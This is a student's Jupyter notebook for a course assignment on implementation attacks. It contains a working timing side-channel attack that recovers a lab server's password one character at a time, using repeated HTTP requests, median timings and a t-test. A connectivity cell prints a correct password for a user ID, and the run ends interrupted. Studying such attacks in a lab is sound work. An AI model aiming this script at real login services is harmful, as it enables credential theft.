## Commands used for docker
```bash
docker pull amarmic/attacks_on_implementations:Assignment1_x86_64
docker run --name ass1 -p 80:8080 amarmic/attacks_on_implementations:Assignment1_x86_64
```

## Commands used for Anaconda to test locally
```bash
conda create --name side_attacks python=3.12
conda install requests
```


In [31]:
import time
import string
import requests
from statistics import median, stdev
from datetime import datetime
from scipy import stats

In [32]:
BASE_URL = "http://aoi-assignment1.oy.ne.ro:8080"
USERNAME = "208009845"
CHARSET = string.ascii_lowercase
CHARSET_LENGTH = 26
REPEATS = 3
MIN_SAMPLES_FOR_EARLY_STOP = 5
PASSWORD_LENGTH = 11
DIFFICULTY = 1
alpha = 0.005
MAX_PASSWORD_LENGTH = 36

In [33]:
# Find length of password
# here we save the time of the query for each password length
def find_password_length():
    vector_iterations = [[] for _ in range(MAX_PASSWORD_LENGTH-1)]
    for PASSWORD_LENGTH in range(1,MAX_PASSWORD_LENGTH):
        password = "a" * PASSWORD_LENGTH
        for iteration in range(REPEATS):
            response_time, response = time_request(password)
            vector_iterations[PASSWORD_LENGTH-1].append(response_time)

    # calculate avg time for each password length
    PASSWORD_LENGTH, max_avg = 0, 0
    for i in range(len(vector_iterations)):
        vector_iterations[i] = sum(vector_iterations[i]) / len(vector_iterations[i])
        if vector_iterations[i] > max_avg:
            max_avg = vector_iterations[i]
            PASSWORD_LENGTH = i+1

    return PASSWORD_LENGTH

In [34]:
def t_test(data, best_time):
    t_stat, p_val = stats.ttest_1samp(data, best_time, alternative='less')
    if p_val < alpha:
        return True
    return False

In [35]:
def time_request(password_guess):
    url = f"{BASE_URL}/?user={USERNAME}&password={password_guess}&difficulty={DIFFICULTY}"
    start = time.time()
    response = requests.get(url)
    end = time.time()
    return end - start, response.text.strip()

# Connectivity Test

In [36]:
password = "parshandata"
response = requests.get(f"{BASE_URL}/?user={USERNAME}&password={password}")
print("Response: ", response.url)
if response.status_code != 200 : # sanity check
  print("Error: ", response.status_code)

if response.text == "1":
   print("correct password")
else:
   print("incorrect password")

Response:  http://aoi-assignment1.oy.ne.ro:8080/?user=208009845&password=parshandata
correct password


In [37]:
def guess_password():
    global REPEATS
    do_not_check_set = [set() for _ in range(MAX_PASSWORD_LENGTH)] # if we go back a letter, we don't want to check it again
    guessed_password = ""
    check_all_letters = False
    min_margin_seconds = 0.25  # minimum difference between top 2 medians to trigger early stop
    timings = []
    for i, c in enumerate(CHARSET):
        trial = guessed_password + c + 'a' * (PASSWORD_LENGTH - len(guessed_password) - 1)
        times_list = []
        for _ in range(REPEATS):
            response_time, response = time_request(trial)
            if response == "1":
                return trial
            times_list.append(pow((response_time + 5), 2))
        med_time = median(times_list)
        timings.append((med_time, c))

    # Early stopping based on timing separation from second best
    timings = sorted(timings, reverse=True)
    best_timing, best_char = timings[0]
    second_best_timing, _ = timings[1]
    third_best_timing, _ = timings[2]

    min_margin_seconds = (((best_timing - second_best_timing) + (best_timing - third_best_timing)) / 2) * 0.8

    if best_timing - second_best_timing > min_margin_seconds:
        guessed_password += best_char
    else:
        # No early stopping — pick the best overall
        best_char = max(timings, key=lambda x: x[0])[1]

    while True:
        # for position in range(1, PASSWORD_LENGTH - 1):
        if len(guessed_password) + 1 < PASSWORD_LENGTH:
            timings = []
            if check_all_letters:
                min_margin_seconds *= 0.75 # ease the early outlier
                min_samples_to_early_stop = 26 # need to check all letter
                REPEATS = REPEATS + 2 # add 2 the the repeats
            else:
                min_samples_to_early_stop = 3 if len(guessed_password) <= 10 else 5

            for i, c in enumerate(CHARSET):
                if c in do_not_check_set[len(guessed_password)]:
                    continue
                trial = guessed_password + c + 'a' * (PASSWORD_LENGTH - len(guessed_password) - 1)
                times_list = []
                for _ in range(REPEATS):
                    response_time, response = time_request(trial)
                    if response == "1":
                        return trial
                    times_list.append(pow((response_time + 5), 2))
                timings.append((median(times_list), c))

                # Early stopping based on timing separation from second best
                if i + 1 >= min_samples_to_early_stop:
                    timings = sorted(timings, reverse=True)
                    best_timing, best_char = timings[0]
                    second_best_timing, _ = timings[1]

                    if best_timing - second_best_timing > min_margin_seconds:
                        guessed_password += best_char
                        if check_all_letters:
                            REPEATS = REPEATS - 2
                            min_margin_seconds *= 1.6
                            check_all_letters = False
                        break
                if i + 1 == CHARSET_LENGTH: #didn't found any char
                    # No early stopping — pick the best overall
                    best_timing, best_char = timings[0]
                    if check_all_letters:
                        min_margin_seconds *= 1.6
                        REPEATS = REPEATS - 2
                    if t_test(times_list, best_timing):
                        guessed_password += best_char
                        check_all_letters = False
                        break
                    else:
                        check_all_letters = True
                        do_not_check_set[len(guessed_password)].add(guessed_password[-1])
                        guessed_password = guessed_password[:-1]
        else: # Last iteration, no need for multiple iterations
            for i, c in enumerate(CHARSET):
                trial = guessed_password + c + 'a' * (PASSWORD_LENGTH - len(guessed_password) - 1)

                _, output = time_request(trial)
                if output == "1":
                    return trial
            check_all_letters = True
            do_not_check_set[len(guessed_password)].add(guessed_password[-1])
            guessed_password = guessed_password[:-1]


if __name__ == "__main__":
    PASSWORD_LENGTH = find_password_length() #password length is unknown, check the length first
    password = guess_password()

    print(password)

KeyboardInterrupt: 